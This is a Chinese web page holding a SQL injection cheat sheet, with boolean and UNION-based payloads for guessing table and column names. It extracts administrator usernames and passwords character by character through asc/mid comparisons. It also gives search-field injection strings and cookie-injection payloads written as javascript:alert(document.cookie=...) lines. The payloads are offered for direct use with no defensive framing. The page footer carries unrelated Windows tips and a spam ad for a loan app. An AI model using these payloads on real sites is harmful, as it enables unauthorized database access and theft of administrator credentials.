客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
猜解表名:
and exists (select * from 表名) 猜解列名: and exists (select 字段 from 表名) UNION法: 联合查询: select name,password,id from user union select user,pwd,uid from 爆指定表名内容: and 1=1 union select 1,2,3,4,5 from 表名 ASCII逐字解码法: 1、猜解列长度 猜解语句: and (select top 1 len(列名)from 表名)>N and (select top 1 len(列名)from 表名)=N 其中N是数字,变换这个N的值猜解列长度,例如: and (select top 1 len(列名)from 表名)>1 and (select top 1 len(列名)from 表名)>6 如果一直猜到6都显示正常页面,猜到7的时候返回错误(大于6并且小于等于7),那么该列的长度为7。因为“top 1”的意思是把最靠前的1条记录给提取出来,所以如果要猜解第二条记录就该使用: select top 1 len(列名) from 表名 where 列名 not in (select top 1 列名 from 表名) 2、ASCII码分析法猜解用户和密码 ASC()函数和Mid函数 例如:mid(列名,N,1) ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码 猜解语句为: and (select top 1 asc(mid(字段,1,1)) from 数据库名)=ASC码(通过转换工具换) 区间判断语句: “......between......and......” 中文处理法: 当ASCII转换后为“负数”使用abs()函数取绝对值。 例:and (select top 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码(通过转换工具换) ASCII逐字解码法的应用: 1、猜解表名: and (select count(*) from admin)<>0 2、猜解列名: and (select count(列名) from 表名)<>0 3、猜解管理员用户个数: and (select count(*) from 表名)=1 返回正常,表中有一条记录。 4、猜解管理员用户名的长度: and (select len(列名) from 表名)>=1、>=2、>=3、>=4。 5、猜解管理员用户名: and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0 最后提交: and (select asc(mid(列名,1,1)) from 表名)=ascii的值 6、猜解管理员的密码: 按照上面的原理,只要把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到管理员的密码了。 搜索型注入漏洞利用猜解语句: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='% 将and 1=1 换成注入语句就可以了。 cookie注入语句: javascript:alert(document.cookie="id=" escape("44 and 1=1")); javascript:alert(document.cookie="id=" escape("44 and 1=2")); 猜解语句: 猜解长度: javascript:alert(document.cookie="id=" escape("44 and (select len(password) from admin)=16")) 猜解内容: javascript:alert(document.cookie="id=" escape("44 and (select asc(mid(username)) from admin)=97")) |
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
六六分期app的软件客服如何联系?不知道吗?加qq群【895510560】即可!标题:六六分期
今天小编告诉大家如何处理win10系统火狐flash插件总是崩溃的问题,可能很多用户都不知
今天小编告诉大家如何对win10系统删除桌面回收站图标进行设置,可能很多用户都不知道
今天小编告诉大家如何对win10系统电脑设置节能降温的设置方法,想必大家都遇到过需要
我们在使用xp系统的过程中,经常需要对xp系统无线网络安装向导设置进行设置,可能很多
今天小编告诉大家如何处理win7系统玩cf老是与主机连接不稳定的问题,可能很多用户都不
电脑对日常生活的重要性小编就不多说了,可是一旦碰到win7系统设置cf烟雾头的问题,很
我们在日常使用电脑的时候,有的小伙伴们可能在打开应用的时候会遇见提示应用程序无法
今天小编告诉大家如何对win7系统打开vcf文件进行设置,可能很多用户都不知道怎么对win
今天小编告诉大家如何对win10系统s4开启USB调试模式进行设置,可能很多用户都不知道怎
请发表评论